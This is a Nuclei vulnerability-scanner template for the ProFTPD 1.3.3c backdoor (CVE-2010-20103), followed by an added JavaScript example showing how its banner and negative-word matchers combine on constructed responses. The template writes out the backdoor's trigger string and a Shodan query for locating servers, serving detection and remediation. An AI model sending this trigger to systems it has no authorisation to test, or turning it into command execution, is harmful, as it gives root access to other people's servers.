Vulnerability description
ProFTPD 1.3.3c contains a command injection backdoor caused by a hidden FTP command trigger in the source tarball, letting remote unauthenticated attackers execute arbitrary shell commands with root privileges.
id: CVE-2010-20103

info:
  name: ProFTPd-1.3.3c - Backdoor Command Execution
  author: pussycat0x
  severity: critical
  description: |
    ProFTPD 1.3.3c contains a command injection backdoor caused by a hidden FTP command trigger in the source tarball, letting remote unauthenticated attackers execute arbitrary shell commands with root privileges.
  remediation: |
    Update to a version later than 1.3.3c or the latest available version.
  reference:
    - https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md
    - https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/
    - https://www.exploit-db.com/exploits/15662
  metadata:
    max-request: 1
    shodan-query: product:"ProFTPD"
  tags: cve,cve2010,js,network,proftpd,ftp,backdoor,vkev,passive,vuln

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      // Send the HELP command with the trigger argument and export whatever the server returns.
      const data = "HELP ACIDBITCHEZ\r\n";
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.Send(data);
      let resp = conn.RecvString();
      Export(resp);
    args:
      Host: "{{Host}}"
      Port: 21

    matchers-condition: and
    matchers:
      # The banner must identify the affected release.
      - type: dsl
        dsl:
          - "success == true"
          - "contains(response, '220 ProFTPD 1.3.3c')"
        condition: and

      # Word matchers compare literally, so the entry is the reply text itself.
      # A server that answers with this reply treated the argument as an unknown command.
      - type: word
        words:
          - "502 Unknown command"
        negative: true
# digest: 4b0a00483046022100c13863b0337f0eebece2831d15de8c1cfc7669a3c18d7e5e7e1f205741a3d22c022100b33e76e7eb7b70a21bd8c10ad18043139c5e0890a0d15365e80855e2385af6b2:922c64590222798bb761d5b6d8e72950
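
How the two matchers combine, as an added example that is not part of the original template: it models the dsl matcher and the negative word matcher over constructed responses, and shows that a word entry written as a DSL expression is compared literally, so it never excludes a server that answered with the 502 reply. Function names, sample banners and the 192.0.2.10 address are assumptions made for illustration.

```javascript
// Added example: models the template's matcher logic. All responses are constructed.
const BANNER = "220 ProFTPD 1.3.3c";
const REJECT = "502 Unknown command";

// A "word" matcher is a literal substring test; "negative" inverts the result.
function wordMatcher(response, words, negative) {
  const hit = words.some((w) => response.includes(w));
  return negative ? !hit : hit;
}

// Both matchers must hold (matchers-condition: and).
function flagged(response, success, negativeWords) {
  const dslOk = success === true && response.includes(BANNER);
  return dslOk && wordMatcher(response, negativeWords, true);
}

const samples = {
  // Banner only: the HELP argument was not answered with an FTP reply.
  noReject: "220 ProFTPD 1.3.3c Server (constructed) [192.0.2.10]\r\n",
  // Same version, but the server rejects the argument as an ordinary unknown command.
  rejected: "220 ProFTPD 1.3.3c Server (constructed) [192.0.2.10]\r\n" +
            "502 Unknown command 'ACIDBITCHEZ'\r\n",
  // Different release: the banner check fails.
  otherVersion: "220 ProFTPD 1.3.5 Server (constructed) [192.0.2.10]\r\n",
};

// Evaluate every sample against one choice of negative word list.
function report(negativeWords) {
  const out = {};
  for (const [name, resp] of Object.entries(samples)) {
    out[name] = flagged(resp, true, negativeWords);
  }
  return out;
}

// Negative word given as the reply text: the rejecting server is excluded.
const literalReply = report([REJECT]);
// Negative word given as a DSL expression: it never occurs in a response,
// so the rejecting server is flagged as well (a false positive).
const dslAsWord = report(["contains(response, '502 Unknown command')"]);
console.log({ literalReply, dslAsWord });
```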